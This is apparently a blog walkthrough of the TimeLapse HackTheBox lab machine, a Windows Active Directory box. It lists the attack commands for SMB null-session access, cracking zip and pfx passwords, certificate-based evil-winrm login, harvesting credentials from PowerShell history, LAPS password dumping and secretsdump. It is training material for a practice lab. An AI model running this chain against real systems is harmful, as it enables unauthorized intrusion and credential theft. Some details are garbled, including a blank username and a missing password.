TimeLapse HackTheBox WalkThrough
This is TimeLapse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
TimeLapse HackTheBox machine. Before starting let us know something about this machine. It is
Windows OS box with IP address
10.10.11.152 and difficulty
easy assigned by its maker.
First of all, connect your PC with
HackTheBox VPN and make sure your connectivity with TimeLapse machine by pinging its IP
10.10.11.152. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used
$ nmap [a popular port scanner] for this task and the result is given below: –
$ sudo nmap -p- --min-rate=10000 -oN tcpfull-scan.nmap 10.10.11.152
$ cat tcpfull-scan.nmap
$ sudo nmap -p53,88,135,139,389,445,464,593,636,3269,5986,9389 -sC -sV -oN tcpScript-scan.nmap 10.10.11.152
$ cat tcpScript-scan.nmap
Full port scan with
$ nmap found port no.
9389 as open. Checking the services on ports
389 it appears to be an
Active Directory environment. Among these ports, the notable ports are 53, 88, 135, 139, 389, 445 & 5986 since the services on these ports are well known.
DNS Server is running on port
Microsoft RPC on
winrm on port
5986 are running. We will use port
5986 for remote logging whenever we will get any credential.
As usual, I started my enumeration from port
SMB service is running on these ports. If
Null Session will be allowed, we will get some information to dig deeper into it.
Null Session is allowed here. Let us connect with the open share and download all the files from the shared folder. After downloading all the files found a
zip file named
$ smbclient -U "" -L //10.10.11.152
$ smbclient //10.10.11.152/Shares
smb: \> cd Dev\
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> exit
The zip file is password protected.
$ unzip winrm_backup.zip
I have used
$ johntheripper [an offline password cracker] and wordlist
rockyou.txt to crack the password of this file.
$ zip2john winrm_backup.zip > zip.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
The cracked password is
supremelegacy. On unzipping
winrm_backup.zip found a
pfx file inside it.
pfx file is an archive file. It contains both
public key as well as
private key and sometimes contains a
chain of keys responsible for trustworthiness of the certificate. All the keys inside any pfx file may or may not be password protected. A pfx file can be used for TLS/SSL on web site, for digitally signing messages or authorization tokens, or for authenticating to a partner system.
Our pfx file is password protected. Tried to login with some default password like
TimeLapse, etc. but none worked. So, we have to crack the password of this file too.
$ unzip winrm_backup.zip -d winrm_backup
$ cd winrm_backup/
$ open legacyy_dev_auth.pfx
To crack the password I have used the same tool
$ johntheripper [an offline password cracker] with the same wordlist
rockyou.txt [rockyou.txt is present by default in the directory
/usr/share/wordlists/ in Kali and Parrot OS.]
$ pfx2john legacyy_dev_auth.pfx > legacy.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt legacy.hash
The cracked password is
pfx file is an archive file and contains public key and private key so let us extract both the keys from this file. We can use
$ openssl tool for this purpose. I have followed this article from IBM documentation for the same.
$ cd winrm_backup/
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
Enter Import Password:
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out key.crt
Enter Import Password:
Now we have both, the certificate containing public key and the private key of the SSL. Also, we have port no.
5986 open on the server so we can use
$ evil-winrm to connect TimeLapse machine using these keys. Let us remotely connect to the server.
Getting User Shell
$ evil-winrm -i 10.10.11.152 -u " " -p "thuglegacy" -c key.crt -k private.key -S
We have successfully logged in into the TimeLapse box. Let us capture user flag.
Capture User Flag
$ cat \Users\legacyy\Desktop\user.txt
To escalate the privilege to root we have to first find a
Privilege Escalation Vector using, which we can perform, privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like winPEAS, PowerUp.ps1, and there are a lot more. This time I will go with
winPEAS viz. script enumeration technique.
Finding PrivEsc Vector
winPEAS found PowerShell Console history file named
ConsoleHost_hostory.txt inside the directory
ConsoleHost_history.txt file is located at the location
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\. It holds history of recent Windows PowerShell commands executed by particular user. This file is same as
.bash_history file in Linux as both these files contain the recent commands used by the particular user.
On checking the content of this file found some Ps-remoting commands already used on this machine. The used user is
svc_deploy and the user password is
$ cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
When I checked the details of user
svg_deploy then found that svg_deploy is part of
$ net user svc_deploy
svg_deploy is the member of
LAPS_Readers group, therefore we can use LAPSDumber tool to dump every LAPS password the account has access to read, within the entire domain. To use
LAPSDumber follow the below steps.
$ git clone https://github.com/n00py/LAPSDumper.git
$ cd LAPSDumper/
$ python3 laps.py -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d 'timelapse.htb'
The extracted local admin password is
5cz8(5ZNvaONZ4u1rio)b#/.. When I tried to login into admin account using the credential
5cz8(5ZNvaONZ4u1rio)b#/. I would easily logged in as
local admin. So here, our Privilege Escalation Vector is
Privilege Escalation by reusing credential stored in PowerShell History.
winrm port  is open so let us use the above credential to get admin access using
Getting Admin Shell
$ evil-winrm -u administrator -p '5cz8(5ZNvaONZ4u1rio)b#/.' -i 10.10.11.152 -S
We have successfully logged in into local admin account. Let us capture root flag.
Capture Root Flag
$ Get-Childitem -Path C:\Users -Include root.txt -Recurse
$ cat C:\Users\TRX\Desktop\root.txt
Dumping Root Hash
$ impacket-secretsdump [email protected]
This was how I rooted to TimeLapse HackTheBox machine. Learnt a lot during this walkthrough. Hope you have also learnt some new things. Thanks for reading this writeup. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.